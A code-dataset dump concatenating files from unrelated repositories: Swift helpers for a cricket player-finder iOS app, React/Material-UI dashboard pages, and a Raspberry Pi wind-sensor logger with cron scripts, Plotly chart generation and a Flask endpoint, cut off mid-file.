        if AppUtility.isValid(msg)
        {
            let alertVC = UIAlertController(title: AppUtility.isValid(screenTitle) ? screenTitle : nil , message: msg!, preferredStyle: .alert)
            let okAction = UIAlertAction(title: OK, style: .default , handler: nil)
            alertVC.addAction(okAction)
            self.present(alertVC, animated: true, completion: nil)
        }
    }
    // Check Internet connection.
    // NOTE(review): duplicates AppUtility.isNetworkConnected -- consider
    // delegating to it.
    func checkNetwork() -> Bool
    {
        let reach = Reachability.forInternetConnection()
        if reach!.isReachableViaWiFi() || reach!.isReachableViaWWAN() {
            return true
        } else {
            return false
        }
    }
    // Show Loader spinner.
    /// Adds a centered, animating gray indicator, tagged so it can be
    /// found and removed later by stopActivityIndicator().
    func startActivityIndicator()
    {
        let loc = self.view.center
        let activityIndicator = UIActivityIndicatorView(style: .gray)
        activityIndicator.tag = ACTIVITY_INDICATOR_TAG
        activityIndicator.center = loc
        activityIndicator.hidesWhenStopped = true
        activityIndicator.startAnimating()
        self.view.addSubview(activityIndicator)
    }
    /// Stops and removes the indicator added by startActivityIndicator(), if any.
    func stopActivityIndicator()
    {
        if let activityIndicator = self.view.subviews.filter(
            { $0.tag == ACTIVITY_INDICATOR_TAG}).first as? UIActivityIndicatorView {
            activityIndicator.stopAnimating()
            activityIndicator.removeFromSuperview()
        }
    }
}
extension StringProtocol
{
    /// The receiver with only its first character uppercased; the rest is unchanged.
    var firstUppercased: String
    {
        return prefix(1).uppercased() + dropFirst()
    }
}
extension String {
    /// Height required to render this string within the given width and font.
    /// - Parameters:
    ///   - width: Maximum line width the text must fit into.
    ///   - font: Font used for measurement.
    /// - Returns: The bounding-box height, rounded up to a whole point.
    func height(withConstrainedWidth width: CGFloat, font: UIFont) -> CGFloat {
        let constraintRect = CGSize(width: width, height: .greatestFiniteMagnitude)
        let boundingBox = self.boundingRect(with: constraintRect, options: .usesLineFragmentOrigin, attributes: [NSAttributedString.Key.font: font], context: nil)
        return ceil(boundingBox.height)
    }
}
<file_sep>//
// AppConstant.swift
// PlayerFinder
//
// Created by Sarika on 27/06/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import Foundation
// Cricket API endpoints.
let SERVER_ADDRESS = "https://cricapi.com/"
let BASE_WS_URL = SERVER_ADDRESS + "api/"
//MARK: - Player Services
// NOTE(review): the "PlAYER" typo is kept - the constant name is referenced elsewhere.
let PlAYER_FINDER_WS_URL = BASE_WS_URL + "playerFinder"
let PLAYER_STATS_WS_URL = BASE_WS_URL + "playerStats"
//MARK: - API Key
let API_KEY = "<KEY>"
// Common JSON response keys.
let STATUS = "status"
let MSG = "msg"
let RESULT = "result"
// Localized UI strings.
let ERROR = NSLocalizedString("Error", comment: "")
let OK = NSLocalizedString("OK", comment: "")
let DELETE = NSLocalizedString("Delete", comment: "")
let CANCEL = NSLocalizedString("Cancel", comment: "")
let DATA = "data"
// View tag used to locate the shared activity indicator (001 is just Int 1).
let ACTIVITY_INDICATOR_TAG = 001
// Thrown when an expected payload decodes to nil; carries the missing item's name.
enum ErrorStatement: Error {
    case FoundNil(String)
}
<file_sep>//
// PlayerDetailResponse.swift
// PlayerFinder
//
// Created by Sarika on 27/06/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import Foundation
/// One expandable section of the player-detail screen's table.
struct PlayerDetail
{
    // Section header text.
    var title : String
    // Whether the section is visually highlighted.
    var highlight : Bool
    // Whether the section is currently expanded.
    var isOpen : Bool
    // Which kind of section this is (bio / batting / bowling).
    var sectionType : TableSection
    // Key/value rows shown when the section is open.
    var skillDetail : [SkillDetail]
}
/// A single key/value statistic row shown inside a PlayerDetail section.
struct SkillDetail
{
    // Display name of the statistic.
    var skillKey : String
    // Formatted value of the statistic.
    var skillValue : String
}
/// Sections of the player-detail table; raw values double as section indices.
enum TableSection : Int{
    case Bio = 0
    case Batting
    case Bowling
}
| 84420d9bc58f5f8f16a9d6e9405e8ea0fc34d417 | [
"Swift"
] | 9 | Swift | SarikaThakurLnt/PlayerFinder | 80e67619c6da72fac5013b0a9e8baeecfd28c5dd | 69ee8096999d24ac485a2ced91c11f75f32772d0 |
refs/heads/master | <file_sep>import React, { useState } from "react";
import styles from "./Organisation.module.css";
import {
Dropdown,
DropdownToggle,
DropdownMenu,
DropdownItem,
} from "reactstrap";
import { makeStyles } from "@material-ui/core/styles";
import Button from "@material-ui/core/Button";
import TextField from "@material-ui/core/TextField";
import SearchIcon from "@material-ui/icons/Search";
import Pagination from '@material-ui/lab/Pagination';
import Table from "../../../../components/OrganisationTable/OrganizationTable";
const useStyles = makeStyles((theme) => ({
root: {
"& > *": {
margin: theme.spacing(1),
},
"& .MuiTextField-root": {
margin: theme.spacing(1),
width: "25ch",
},
},
}));
export default function OrganisationSamadhanID() {
const classes = useStyles();
const [dropdownOpen, setDropdownOpen] = useState(false);
const toggle = () => setDropdownOpen((prevState) => !prevState);
return (
<div className={styles.main}>
<div className={styles.title}>
<span>Organisation List</span>
</div>
<div className={styles.tableDiv}>
<div className={styles.searchBarDiv}>
<div className={styles.searchAndDrop}>
<div>
<div className={styles.searchBar}>
<SearchIcon />
<TextField
id="standard-search"
label="Search..."
type="search"
InputProps={{ disableUnderline: true }}
/>
</div>
</div>
<div className={styles.dropDownDiv}>
<Dropdown
isOpen={dropdownOpen}
toggle={toggle}
style={{ borderColor: "#D7DAE2" }}
>
<DropdownToggle
caret
style={{
backgroundColor: "white",
color: "#A4AFB7",
}}
>
Status
</DropdownToggle>
<DropdownMenu>
<DropdownItem header>Actions</DropdownItem>
<DropdownItem>Some Action</DropdownItem>
<DropdownItem>Action</DropdownItem>
<DropdownItem>Foo Action</DropdownItem>
<DropdownItem>Bar Action</DropdownItem>
<DropdownItem>Quo Action</DropdownItem>
</DropdownMenu>
</Dropdown>
<Button
variant="contained"
style={{
backgroundColor: "#43425D",
color: "white",
borderRadius: "17px",
textTransform: 'none'
}}
>
Search
</Button>
</div>
</div>
<div>
<Button
variant="contained"
style={{
backgroundColor: "#F2134F",
color: "white",
borderRadius: "5px",
fontSize: "15px",
textTransform: 'none'
}}
>
Add new organisation
</Button>
</div>
</div>
<div className={styles.table}>
<Table />
</div>
<div style={{ paddingTop:'2%',display: 'flex', flexDirection: 'row', justifyContent: 'flex-end' }}>
<Pagination count={10} variant="outlined" shape="rounded" color='primary'/>
</div>
</div>
</div>
);
}
<file_sep>import React from "react";
import { makeStyles, withStyles } from "@material-ui/core/styles";
import styles from "./AuditJob.module.css";
import InputLabel from "@material-ui/core/InputLabel";
import FormControl from "@material-ui/core/FormControl";
import Select from "@material-ui/core/Select";
import DatePicker from "../../../../../../components/DatePicker/DatePicker";
import Card from "@material-ui/core/Card";
import CardContent from "@material-ui/core/CardContent";
import back from "./back.png";
import Dropdown from "../../../../../../components/Select/Select";
import Typography from "@material-ui/core/Typography";
const useStyles = makeStyles({
root: {
maxWidth: "45%",
minWidth: "40%",
},
title: {
fontSize: 14,
},
pos: {
marginBottom: "10",
},
});
export default function Initialisation() {
const classes = useStyles();
const [state, setState] = React.useState({
age: "",
name: "hai",
});
const handleChange = (event) => {
const name = event.target.name;
setState({
...state,
[name]: event.target.value,
});
};
const normalise = (value) => value / 10;
return (
<div className={styles.main}>
<div className={styles.header}>
<div className={styles.title}>
<span style={{ fontWeight: "light", color: "#43425D" }}>
Operations /
</span>
<span style={{ fontWeight: "lighter", color: "#BBBBBB" }}>
Job Reporting
</span>
</div>
<div className={styles.dropdownMain}>
<Dropdown holder="Audit Job" />
</div>
</div>
<div className={styles.header2}>
<span className={styles.subTitle}>Audit Job</span>
<div className={styles.dropdown2}>
<Dropdown holder="Today" />
</div>
<div className={styles.date}>
<span className={styles.label}>From Date</span>
<DatePicker width="80%" />
<span className={styles.label}>To Date</span>
<DatePicker width="80%" />
</div>
</div>
<div className={styles.cards}>
<Card className={classes.root}>
<CardContent>
<Typography
className={classes.pos}
style={{
color: "#03E565",
textAlign: "center",
fontSize: "xx-large",
fontWeight: "bold",
paddingBottom: "5%",
}}
>
500
</Typography>
</CardContent>
<Typography
style={{
color: "#BBBBBB",
textAlign: "center",
fontSize: "110%",
}}
gutterBottom
>
The number of properties sent into reattempt per day
</Typography>
</Card>
<Card className={classes.root}>
<CardContent>
<Typography
className={classes.pos}
style={{
color: "#FF6060",
textAlign: "center",
fontSize: "xx-large",
fontWeight: "bold",
paddingBottom: "5%",
}}
>
188
</Typography>
</CardContent>
<Typography
style={{
color: "#BBBBBB",
textAlign: "center",
alignItems: "center",
fontSize: "110%",
}}
gutterBottom
>
Total Pending properties with reattempt till now
</Typography>
</Card>
</div>
<div className={styles.final}>
<span
className={styles.label}
style={{
fontWeight: "bold",
cursor: "pointer",
fontSize: "large",
}}
>
View Full Details
</span>
<img src={back} />
</div>
</div>
);
}
<file_sep>import React, { useState } from 'react'
import styles from './SamadhanIDViewAll.module.css'
import { Dropdown, DropdownToggle, DropdownMenu, DropdownItem } from 'reactstrap';
import { makeStyles } from '@material-ui/core/styles';
import Button from '@material-ui/core/Button';
import TextField from '@material-ui/core/TextField';
import SearchIcon from '@material-ui/icons/Search';
import Table from '../../../../components/Table/Table'
const useStyles = makeStyles((theme) => ({
root: {
'& > *': {
margin: theme.spacing(1),
},
'& .MuiTextField-root': {
margin: theme.spacing(1),
width: '25ch',
},
},
}));
export default function OrganisationSamadhanID() {
const classes = useStyles();
const [dropdownOpen, setDropdownOpen] = useState(false);
const toggle = () => setDropdownOpen(prevState => !prevState);
return (
<div className={styles.main}>
<div className={styles.title}>
<span style={{ fontWeight: 'bolder' }}>Samadhan ID /</span>
<span style={{ fontWeight: 'bolder'}}> Blank Samadhan ID /</span>
<span style={{ fontWeight: 'lighter', color: 'gray' }}>View All</span>
</div>
<div className={styles.tableDiv}>
<div className={styles.searchBarDiv}>
<div>
<div className={styles.searchBar}>
<SearchIcon />
<TextField id="standard-search" label="Search..." type="search" />
</div>
</div>
<div className={styles.dropDownDiv}>
<Dropdown isOpen={dropdownOpen} toggle={toggle}>
<DropdownToggle caret style={{ backgroundColor: 'white', color: 'grey' }}>
Organisation
</DropdownToggle>
<DropdownMenu>
<DropdownItem header>Actions</DropdownItem>
<DropdownItem>Some Action</DropdownItem>
<DropdownItem>Action</DropdownItem>
<DropdownItem>Foo Action</DropdownItem>
<DropdownItem>Bar Action</DropdownItem>
<DropdownItem>Quo Action</DropdownItem>
</DropdownMenu>
</Dropdown>
<Button variant="contained" style={{ backgroundColor: '#21034B', color: 'white', borderRadius: '20px' }}>
Search
</Button>
</div>
<div>
<Button variant="contained" color="secondary">
Secondary
</Button>
</div>
</div>
<div className={styles.table}>
<Table />
</div>
</div>
</div>
)
}
<file_sep>import React from "react";
import { makeStyles, withStyles } from "@material-ui/core/styles";
import styles from "./Initialisation.module.css";
import InputLabel from "@material-ui/core/InputLabel";
import FormControl from "@material-ui/core/FormControl";
import Select from "@material-ui/core/Select";
import DatePicker from "../../../../../../components/DatePicker/DatePicker";
import Card from "@material-ui/core/Card";
import CardContent from "@material-ui/core/CardContent";
import back from "./back.png";
import LinearProgress from "@material-ui/core/LinearProgress";
import Dropdown from "../../../../../../components/Select/Select";
import Typography from "@material-ui/core/Typography";
const BorderLinearProgress = withStyles((theme) => ({
root: {
height: 5,
borderRadius: 5,
paddingTop: "2%",
},
colorPrimary: {
backgroundColor: "#DFDFDF",
},
bar: {
borderRadius: 5,
backgroundColor: (props) => props.color,
padding: "2%",
},
}))(LinearProgress);
const useStyles = makeStyles({
root: {
maxWidth: "30%",
minWidth: "30%",
},
title: {
fontSize: 14,
},
pos: {
marginBottom: "12",
},
});
export default function Initialisation() {
const classes = useStyles();
const [state, setState] = React.useState({
age: "",
name: "hai",
});
const handleChange = (event) => {
const name = event.target.name;
setState({
...state,
[name]: event.target.value,
});
};
const normalise = (value) => value / 10;
return (
<div className={styles.main}>
<div className={styles.header}>
<div className={styles.title}>
<span style={{ fontWeight: "light", color: "#43425D" }}>
Operations /
</span>
<span style={{ fontWeight: "lighter", color: "#BBBBBB" }}>
Job Reporting
</span>
</div>
<div className={styles.dropdownMain}>
<Dropdown holder="Initialisation" />
</div>
</div>
<div className={styles.header2}>
<span className={styles.subTitle}>Initialisation</span>
<div className={styles.dropdown2}>
<Dropdown holder="Today" />
</div>
<div className={styles.date}>
<span className={styles.label}>From Date</span>
<DatePicker width="80%" />
<span className={styles.label}>To Date</span>
<DatePicker width="80%" />
</div>
</div>
<div className={styles.cards}>
<Card className={classes.root}>
<CardContent>
<Typography
className={classes.title}
style={{
color: "#BBBBBB",
textAlign: "center",
fontSize: "large",
whiteSpace: "nowrap",
}}
gutterBottom
>
Number of jobs created
</Typography>
<Typography
className={classes.pos}
style={{
color: "#03E565",
textAlign: "center",
fontSize: "33px",
fontWeight: "bold",
paddingBottom: "5%",
}}
>
500
</Typography>
<BorderLinearProgress
variant="determinate"
value={normalise(500)}
color="#03E565"
style={{
backgroundColor: "#DFDFDF",
}}
/>
</CardContent>
</Card>
<Card className={classes.root}>
<CardContent>
<Typography
className={classes.title}
style={{
color: "#BBBBBB",
textAlign: "center",
fontSize: "large",
whiteSpace: "nowrap",
}}
gutterBottom
>
Total number of cards initialised
</Typography>
<Typography
className={classes.pos}
style={{
color: "#56BBFE",
textAlign: "center",
fontSize: "33px",
fontWeight: "bold",
paddingBottom: "5%",
}}
>
247
</Typography>
<BorderLinearProgress
variant="determinate"
value={normalise(247)}
color="#56BBFE"
style={{
backgroundColor: "#DFDFDF",
}}
/>
</CardContent>
</Card>
<Card className={classes.root}>
<CardContent>
<Typography
className={classes.title}
style={{
color: "#BBBBBB",
textAlign: "center",
fontSize: "large",
whiteSpace: "nowrap",
}}
gutterBottom
>
Total number of cards Quarantined
</Typography>
<Typography
className={classes.pos}
style={{
color: "#FF6060",
textAlign: "center",
fontSize: "33px",
fontWeight: "bold",
paddingBottom: "5%",
}}
>
188
</Typography>
<BorderLinearProgress
variant="determinate"
value={normalise(188)}
color="#FF6060"
style={{
backgroundColor: "#DFDFDF",
}}
/>
</CardContent>
</Card>
</div>
<div className={styles.final}>
<span
className={styles.label}
style={{
fontWeight: "bold",
cursor: "pointer",
fontSize: "large",
}}
>
View Full Details
</span>
<img src={back} />
</div>
</div>
);
}
| bd176271eba5022ec23d3fdb596a6fa3170b1b47 | [
"JavaScript"
] | 4 | JavaScript | starwiz-7/reactjs-application | 49ecce02811515798e9dd53c428180cd727d2218 | a5799df3d29bc73df4ee323c2d7e4a1b3a41c984 |
refs/heads/master | <repo_name>csrwng/ovirt-csi-driver-operator<file_sep>/go.mod
module github.com/ovirt/csi-driver-operator
go 1.16
require (
github.com/go-bindata/go-bindata v3.1.2+incompatible
github.com/google/gofuzz v1.2.0 // indirect
github.com/openshift/api v0.0.0-20210521075222-e273a339932a
github.com/openshift/build-machinery-go v0.0.0-20210423112049-9415d7ebd33e
github.com/openshift/client-go v0.0.0-20210521082421-73d9475a9142
github.com/openshift/library-go v0.0.0-20210618134649-ef142b5ac039
github.com/ovirt/go-ovirt v0.0.0-20201023070830-77e357c438d5
github.com/prometheus/client_golang v1.7.1
github.com/spf13/cobra v1.1.1
github.com/spf13/pflag v1.0.5
golang.org/x/text v0.3.5 // indirect
gopkg.in/yaml.v2 v2.4.0
k8s.io/api v0.21.1
k8s.io/apimachinery v0.21.1
k8s.io/client-go v0.21.1
k8s.io/component-base v0.21.1
k8s.io/klog/v2 v2.8.0
)
<file_sep>/pkg/operator/storageclass_controller.go
package operator
import (
"context"
"fmt"
"github.com/openshift/library-go/pkg/controller/factory"
"github.com/openshift/library-go/pkg/operator/events"
"github.com/openshift/library-go/pkg/operator/resource/resourceapply"
"github.com/openshift/library-go/pkg/operator/v1helpers"
"github.com/ovirt/csi-driver-operator/internal/ovirt"
ovirtsdk "github.com/ovirt/go-ovirt"
corev1 "k8s.io/api/core/v1"
storagev1 "k8s.io/api/storage/v1"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
"k8s.io/klog/v2"
)
type OvirtStrogeClassController struct {
operatorClient v1helpers.OperatorClient
kubeClient kubernetes.Interface
kubeInformersForNamespace v1helpers.KubeInformersForNamespaces
eventRecorder events.Recorder
ovirtClient *ovirt.Client
nodeName string
}
func NewOvirtStrogeClassController(operatorClient v1helpers.OperatorClient,
kubeClient kubernetes.Interface,
kubeInformersForNamespace v1helpers.KubeInformersForNamespaces,
ovirtClient *ovirt.Client,
nodeName string,
eventRecorder events.Recorder) factory.Controller {
c := &OvirtStrogeClassController{
operatorClient: operatorClient,
kubeClient: kubeClient,
eventRecorder: eventRecorder,
ovirtClient: ovirtClient,
nodeName: nodeName,
}
return factory.New().WithSync(c.sync).WithSyncDegradedOnError(operatorClient).WithInformers(
operatorClient.Informer(),
kubeInformersForNamespace.InformersFor("").Storage().V1().StorageClasses().Informer(),
).ToController("OvirtStorageClassController", eventRecorder)
}
func (c *OvirtStrogeClassController) sync(ctx context.Context, syncCtx factory.SyncContext) error {
sdName, err := c.getStorageDomain(ctx)
if err != nil {
klog.Errorf(fmt.Sprintf("Failed to get Storage Domain name: %v", err))
return err
}
storageClass := generateStorageClass(sdName)
existingStorageClass, err := c.kubeClient.StorageV1().StorageClasses().Get(ctx, storageClass.Name, metav1.GetOptions{})
if err != nil {
if !apierrors.IsNotFound(err) {
klog.Errorf(fmt.Sprintf("Failed to issue get request for storage class %s, error: %v", storageClass.Name, err))
return err
}
} else {
klog.Info(fmt.Sprintf("Storage Class %s already exists", existingStorageClass.Name))
storageClass = existingStorageClass
}
_, _, err = resourceapply.ApplyStorageClass(c.kubeClient.StorageV1(), c.eventRecorder, storageClass)
if err != nil {
klog.Errorf(fmt.Sprintf("Failed to apply storage class: %v", err))
return err
}
return nil
}
func (c *OvirtStrogeClassController) getStorageDomain(ctx context.Context) (string, error) {
get, err := c.kubeClient.CoreV1().Nodes().Get(ctx, c.nodeName, metav1.GetOptions{})
if err != nil {
klog.Errorf(fmt.Sprintf("Failed to get node: %v", err))
return "", err
}
nodeID := get.Status.NodeInfo.SystemUUID
conn, err := c.ovirtClient.GetConnection()
if err != nil {
klog.Errorf(fmt.Sprintf("Connection to ovirt failed: %v", err))
return "", err
}
vmService := conn.SystemService().VmsService().VmService(nodeID)
attachments, err := vmService.DiskAttachmentsService().List().Send()
if err != nil {
klog.Errorf(fmt.Sprintf("Failed to fetch attachments: %v", err))
return "", err
}
for _, attachment := range attachments.MustAttachments().Slice() {
if attachment.MustBootable() {
d, err := conn.FollowLink(attachment.MustDisk())
if err != nil {
klog.Errorf("Failed to follow disk: %v", err)
return "", err
}
disk, ok := d.(*ovirtsdk.Disk)
klog.Info(fmt.Sprintf("Extracting Storage Domain from disk: %s", disk.MustId()))
if !ok {
klog.Errorf(fmt.Sprintf("Failed to fetch disk: %v", err))
return "", err
}
s, err := conn.FollowLink(disk.MustStorageDomains().Slice()[0])
if err != nil {
klog.Errorf("Failed to follow Storage Domain: %v", err)
return "", err
}
sd, ok := s.(*ovirtsdk.StorageDomain)
klog.Info(fmt.Sprintf("Fetched Storage Domain %s", sd.MustName()))
if !ok {
klog.Errorf(fmt.Sprintf("Failed to fetch Storage Domain: %v", err))
return "", err
}
return sd.MustName(), nil
}
}
return "", nil
}
func generateStorageClass(storageDomainName string) *storagev1.StorageClass {
reclaimPolicy := corev1.PersistentVolumeReclaimDelete
expected := &storagev1.StorageClass{
ObjectMeta: metav1.ObjectMeta{
Name: "ovirt-csi-sc",
Namespace: defaultNamespace,
},
TypeMeta: metav1.TypeMeta{
Kind: "StorageClass",
APIVersion: "storage.k8s.io/v1",
},
Provisioner: instanceName,
Parameters: map[string]string{"storageDomainName": storageDomainName, "thinProvisioning": "true"},
ReclaimPolicy: &reclaimPolicy,
MountOptions: []string{},
AllowVolumeExpansion: boolPtr(true),
}
expected.Annotations = map[string]string{
"storageclass.kubernetes.io/is-default-class": "true",
}
return expected
}
func boolPtr(val bool) *bool {
return &val
}
| 6d0b2666364ff1843751c1acde4f0224dcbcbfb1 | [
"Go",
"Go Module"
] | 2 | Go Module | csrwng/ovirt-csi-driver-operator | 125fbf8af234b0aeea50c4bea714c7525f4899ef | 73c9a456408488f435154cabeb3a5eedfe492eb3 |
refs/heads/master | <file_sep>#!/bin/bash
source ~/.bashrc
# Set up crontab
# Idempotently install cron entries: a weekly restart of this script and an
# hourly upload of the collected logs. Each block is skipped when the entry
# already exists in the current crontab.
if ! crontab -l | grep -q run_output_log.sh; then
crontab -l > curr_cron
echo '0 0 * * 0 /home/pi/ws/wind_sensor/rasp/run_output_log.sh >> /home/pi/ws/wind_sensor/rasp/log.txt' >> curr_cron
crontab curr_cron
rm curr_cron
fi
if ! crontab -l | grep -q post_output_log.sh; then
crontab -l > curr_cron
echo '0 * * * * /home/pi/ws/wind_sensor/rasp/post_output_log.sh >> /home/pi/ws/wind_sensor/rasp/log.txt' >> curr_cron
crontab curr_cron
rm curr_cron
fi
# Kill existing output_log.py process
echo "Killing existing output log process"
ps -ef | grep output_log.py | awk '{print $2}' | xargs kill -9
sleep 5
echo "Start new output log proces"
# Start new output_log.py process
# Detached via nohup so it survives this shell; output appended to log.txt.
nohup python3 /home/pi/ws/wind_sensor/pyserial/output_log.py >> log.txt 2>&1 &
<file_sep>import argparse, sys
from datetime import datetime
import mysql.connector
import plotly.graph_objects as go
import numpy as np
import os
mydb = mysql.connector.connect(
host="localhost",
user="wind_sensor",
passwd="<PASSWORD>",
database="wind_sensor_db"
)
mycursor = mydb.cursor(buffered=True)
def validate_date(date_text):
    """Return True only if *date_text* is a canonical %Y%m%d date string."""
    try:
        parsed = datetime.strptime(date_text, "%Y%m%d")
    except ValueError:
        return False
    # Round-trip to reject non-canonical spellings the parser tolerates.
    return parsed.strftime("%Y%m%d") == date_text
def validate_hour(hour_text):
    """Return True only if *hour_text* is a canonical %Y%m%d-%H hour string."""
    try:
        parsed = datetime.strptime(hour_text, "%Y%m%d-%H")
    except ValueError:
        return False
    # Round-trip to reject non-canonical spellings the parser tolerates.
    return parsed.strftime("%Y%m%d-%H") == hour_text
def mean(l):
    """Return the arithmetic mean of *l*, whose items are int-like values.

    Converts each item once (the original built the int list twice) and
    raises ZeroDivisionError on an empty sequence, as before.
    """
    values = [int(v) for v in l]
    return float(sum(values)) / float(len(values))
def generate_daily_report(day):
    """Generate the hourly-average chart and daily mean stat for *day*.

    day -- date string in %Y%m%d form; validated by the caller in __main__,
    which is what keeps its interpolation into the LIKE clause safe.

    Writes charts/daily/<day>.html and stats/day; returns True without
    writing anything when the day has no rows.
    """
    mycursor.execute("SELECT * FROM wind_sensor_data WHERE capture_time LIKE '" + day + "%';")
    data = np.array(list(mycursor.fetchall()))
    if len(data) == 0:
        return True
    x = data[:, 0]  # capture_time strings, "%Y%m%d-%H:%M"
    y = data[:, 1]  # per-minute wind-speed counts (as strings)
    hourly_y = []
    curr_hour_mark = x[0][:11]  # "%Y%m%d-%H" prefix of the first row
    hourly_x = [datetime.strptime(curr_hour_mark, "%Y%m%d-%H")]
    curr_hour_values = []
    for i in range(len(x)):
        if x[i][:11] != curr_hour_mark:
            # Hour boundary: close the previous bucket, open a new one.
            curr_hour_mark = x[i][:11]
            hourly_y.append(mean(curr_hour_values))
            hourly_x.append(datetime.strptime(curr_hour_mark, "%Y%m%d-%H"))
            curr_hour_values = []
        curr_hour_values.append(y[i])
    # Bug fix: flush the final hour's bucket. Previously the day's last hour
    # was accumulated but never averaged, so it was missing from the chart.
    hourly_y.append(mean(curr_hour_values))
    fig = go.Figure()
    fig.add_trace(go.Scatter(x=hourly_x, y=hourly_y, name="Normalised hourly values"))
    fig.update_layout(
        title='Wind speed data for date ' + day,
        xaxis=dict(
            title='Time',
            titlefont_size=16,
            tickfont_size=14,
        ),
        yaxis=dict(
            title='Wind speed unit',
            titlefont_size=16,
            tickfont_size=14,
        )
    )
    fig.write_html(os.getenv("HOME") + "/ws/wind_sensor/gcp/charts/daily/" + day + ".html")
    with open(os.getenv("HOME") + "/ws/wind_sensor/gcp/stats/day", "w") as f:
        f.write(str("%.2f" % mean(y)))
def generate_hourly_report(hour):
    """Generate the per-minute bar chart and hourly mean stat for *hour*.

    hour -- hour string in %Y%m%d-%H form; validated by the caller in
    __main__, which is what keeps its interpolation into the LIKE clause safe.

    Writes charts/hourly/<hour>.html and stats/hour; returns True without
    writing anything when the hour has no rows.
    """
    mycursor.execute("SELECT * FROM wind_sensor_data WHERE capture_time LIKE '" + hour + "%';")
    data = np.array(list(mycursor.fetchall()))
    if (len(data) == 0):
        return True
    # Column 0: capture_time strings; column 1: per-minute counts.
    x = [datetime.strptime(t, '%Y%m%d-%H:%M') for t in data[:,0]]
    y = data[:,1]
    fig = go.Figure()
    fig.add_trace(go.Bar(x=x,y=y,name="Minute values"))
    fig.update_layout(
        title = 'Wind speed data for hour ' + hour,
        xaxis = dict(
            title = 'Time',
            titlefont_size=16,
            tickfont_size=14,
        ),
        yaxis=dict(
            title = 'Wind speed unit',
            titlefont_size=16,
            tickfont_size=14,
        )
    )
    fig.write_html(os.getenv("HOME") + "/ws/wind_sensor/gcp/charts/hourly/" + hour + ".html")
    with open(os.getenv("HOME") + "/ws/wind_sensor/gcp/stats/hour", "w") as f:
        f.write(str("%.2f" % mean(y)))
if __name__=="__main__":
    # CLI entry point: exactly one of --day / --hour must be supplied.
    parser = argparse.ArgumentParser(description="Input date or hour to proceed with chart generation")
    parser.add_argument("--day", type=str, help="Generate chart based on given date.", default="NA")
    parser.add_argument("--hour", type=str, help="Generate chart based on given hour.", default="NA")
    args = parser.parse_args()
    # "NA" sentinel means "not supplied"; reject none-given and both-given.
    if (args.day == "NA" and args.hour =="NA") or (args.day != "NA" and args.hour !="NA"):
        print("Please supply only one parameter (day or hour)")
        sys.exit(1)
    if (args.day != "NA"):
        # Validate before use: the value is interpolated into SQL downstream.
        if not validate_date(args.day):
            print("Incorrect day format received. Must be %Y%m%d")
            sys.exit(1)
        generate_daily_report(args.day)
    if (args.hour != "NA"):
        if not validate_hour(args.hour):
            print("Incorrect hour format received. Must be %Y%m%d-%H")
            sys.exit(1)
        generate_hourly_report(args.hour)
<file_sep># make a script that runs on raspberry pi start up, to output windspeed to log + upload to cloud
# tbc
<file_sep>import serial
from datetime import datetime
ser = serial.Serial('/dev/ttyACM0')
print(ser.name)
while True:
    # Bug fix: take a single timestamp per iteration so the hour used for the
    # filename and the minute written in the row cannot disagree (previously
    # two separate datetime.now() calls could straddle an hour boundary).
    now = datetime.now()
    hour = now.strftime("%Y%m%d-%H")
    minute = now.strftime("%Y%m%d-%H:%M")
    filename = "/home/pi/ws/wind_sensor/pyserial/logs/windspeed-" + hour + ".txt"
    # ser.read() blocks until the Arduino emits its once-per-minute count byte.
    with open(filename, "a") as f:
        f.write(minute + "," + str(ord(ser.read())) + "\n")
<file_sep>#!/bin/bash
source ~/.bashrc
# Regenerate the daily and hourly charts inside the project's virtualenv.
source ~/ws/wind_sensor/gcp/wind_sensor/bin/activate
day=$(date +"%Y%m%d")
hour=$(date +"%Y%m%d-%H")
python $HOME/ws/wind_sensor/gcp/generate_charts.py --day="$day" >> $HOME/ws/wind_sensor/gcp/log.txt
python $HOME/ws/wind_sensor/gcp/generate_charts.py --hour="$hour" >> $HOME/ws/wind_sensor/gcp/log.txt
# Publish the freshly generated charts; fall back to a default page when no
# data exists yet for the current day/hour.
if [ -f $HOME/ws/wind_sensor/gcp/charts/daily/$day.html ] ; then
cp $HOME/ws/wind_sensor/gcp/charts/daily/$day.html $HOME/ws/wind_sensor/gcp/templates/current_day.html
else
cp $HOME/ws/wind_sensor/gcp/charts/daily/default.html $HOME/ws/wind_sensor/gcp/templates/current_day.html
fi
if [ -f $HOME/ws/wind_sensor/gcp/charts/hourly/$hour.html ] ; then
cp $HOME/ws/wind_sensor/gcp/charts/hourly/$hour.html $HOME/ws/wind_sensor/gcp/templates/current_hour.html
else
cp $HOME/ws/wind_sensor/gcp/charts/hourly/default.html $HOME/ws/wind_sensor/gcp/templates/current_hour.html
fi
<file_sep>from flask import Flask, request, render_template
import mysql.connector
from datetime import datetime
import os
mydb = mysql.connector.connect(
host="localhost",
user="wind_sensor",
passwd="<PASSWORD>",
database="wind_sensor_db"
)
mycursor = mydb.cursor(buffered=True)
app = Flask(__name__)
def validate_date(date_text):
    """Return True only if *date_text* is a canonical %Y%m%d-%H:%M timestamp."""
    try:
        parsed = datetime.strptime(date_text, "%Y%m%d-%H:%M")
    except ValueError:
        return False
    # Round-trip to reject non-canonical spellings the parser tolerates.
    return parsed.strftime("%Y%m%d-%H:%M") == date_text
@app.route("/", methods=['GET'])
def home():
    # Landing page: shows today's and the last hour's average readings, read
    # from the stats files refreshed by run_charts.sh.
    # NOTE(review): assumes $HOME is set and both stats files exist - confirm.
    day = open(os.getenv("HOME") + "/ws/wind_sensor/gcp/stats/day", "r").read()
    hour = open(os.getenv("HOME") + "/ws/wind_sensor/gcp/stats/hour", "r").read()
    return "<h1>Oscar's wind sensor data</h1><p><h4>Today's average reading is " + day + " units.</h4><p><a href='day'>Today's sensor data</a><p><h4>Last hour's average reading is " + hour + " units.</h4><p><a href='hour'>Last hour's sensor data</a>"
@app.route("/day", methods=['GET'])
def day():
    # Serves the pre-generated chart copied to templates/current_day.html.
    return render_template('current_day.html')
@app.route("/hour", methods=['GET'])
def hour():
    # Serves the pre-generated chart copied to templates/current_hour.html.
    return render_template('current_hour.html')
@app.route("/", methods=['POST'])
def update_db():
    """Ingest posted wind-speed rows, one "<%Y%m%d-%H:%M>,<value>" per line.

    The body's last line must be "&api-key=dev". Valid rows are upserted
    into wind_sensor_data; malformed rows are logged and skipped.
    """
    # Bug fix: request.get_data() returns bytes on Python 3, which cannot be
